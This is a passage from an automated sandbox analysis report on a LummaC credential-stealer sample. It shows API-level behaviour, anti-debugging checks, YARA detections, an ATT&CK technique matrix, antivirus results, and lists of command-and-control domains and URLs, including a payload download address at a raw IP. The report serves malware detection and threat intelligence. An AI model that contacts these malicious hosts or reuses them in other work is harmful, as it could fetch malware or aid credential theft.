                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE092B mov eax, dword ptr fs:[00000030h]3_2_00AE092B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE0D90 mov eax, dword ptr fs:[00000030h]3_2_00AE0D90
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00BD9363 push dword ptr fs:[00000030h]3_2_00BD9363
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024BA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024BA63A
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024A073A
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0249FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0249FB78
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A08CD SetUnhandledExceptionFilter,0_2_024A08CD

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  LummaC encrypted strings found
                  Source: 3247.tmp.exeString found in binary or memory: debonairnukk.xyz
                  Source: 3247.tmp.exeString found in binary or memory: diffuculttan.xyz
                  Source: 3247.tmp.exeString found in binary or memory: effecterectz.xyz
                  Source: 3247.tmp.exeString found in binary or memory: deafeninggeh.biz
                  Source: 3247.tmp.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeProcess created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe "C:\Users\user\AppData\Local\Temp\3247.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_004351C0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_0043B282
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_0043B368
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_0043B645
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_0043B875
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024CB271
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_024C5034
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_024C5427
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_024CB4E9
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_024CB534
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: EnumSystemLocalesW,0_2_024CB5CF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_024CBADC
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024CBBA9
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_024CB8AC
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,0_2_024CB8A3
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024CB9D5
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.2.3247.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.3247.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.3247.tmp.exe.b30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.3247.tmp.exe.b30000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.2.3247.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.3247.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.3247.tmp.exe.b30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.3247.tmp.exe.b30000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024B1B33
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024B0E5D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		Boot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Query Registry                  		Remote Desktop Protocol1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager131
                  Security Software Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture124
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                  Obfuscated Files or Information                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                  Software Packing                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync2
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575128 Sample: XIaCqh1vRm.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 12 other signatures 2->50 8 XIaCqh1vRm.exe 1 17 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49711, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 104.21.56.70, 443, 49710 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\3247.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (overwrites its own PE header) 8->52 13 3247.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 immureprech.biz 104.21.22.222, 443, 49727 CLOUDFLARENETUS United States 13->36 38 deafeninggeh.biz 104.21.96.1, 443, 49739 CLOUDFLARENETUS United States 13->38 40 steamcommunity.com 104.102.49.254, 443, 49754 AKAMAI-ASUS United States 13->40 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Detected unpacking (changes PE section rights) 13->58 60 2 other signatures 13->60 17 WerFault.exe 19 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  XIaCqh1vRm.exe42%VirustotalBrowse
                  XIaCqh1vRm.exe47%ReversingLabsWin32.Trojan.LummaC
                  XIaCqh1vRm.exe100%AviraHEUR/AGEN.1312567
                  XIaCqh1vRm.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe42%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe42%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exeW0%Avira URL Cloudsafe
                  http://176.113.115.19/ScreenUpdateSync.exe100%Avira URL Cloudmalware
                  https://wrathful-jammy.cyou/z100%Avira URL Cloudmalware
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEQ100%Avira URL Cloudmalware
                  https://immureprech.biz/apix100%Avira URL Cloudmalware
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE6100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		104.21.56.70
                  		truefalse
                    		high
                    steamcommunity.com
                    		104.102.49.254
                    		truefalse
                      		high
                      immureprech.biz
                      		104.21.22.222
                      		truefalse
                        		high
                        deafeninggeh.biz
                        		104.21.96.1
                        		truefalse
                          		high
                          sordid-snaked.cyou
                          		unknown
                          		unknownfalse
                            		high
                            diffuculttan.xyz
                            		unknown
                            		unknownfalse
                              		high
                              effecterectz.xyz
                              		unknown
                              		unknownfalse
                                		high
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        diffuculttan.xyzfalse
                                                          		high
                                                          https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                            		high
                                                            https://deafeninggeh.biz/apifalse
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://player.vimeo.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.microsoftXIaCqh1vRm.exe, 00000000.00000003.1349903583.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000003.1351268166.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcasts3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://176.113.115.19/ScreenUpdateSync.exeWXIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/subscriber_agreement/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://176.113.115.19/ScreenUpdateSync.exeXIaCqh1vRm.exe, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.valvesoftware.com/legal.htm3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af63247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://wrathful-jammy.cyou/z3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=13247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://steam.tv/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://post-to-me.com/track_prt.php?sub=&cc=DEXIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sketchfab.com3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://lv.queniujq.cn3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.youtube.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/privacy_agreement/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://post-to-me.com/track_prt.php?sub=XIaCqh1vRm.exefalse
                                                                                                                                        		high
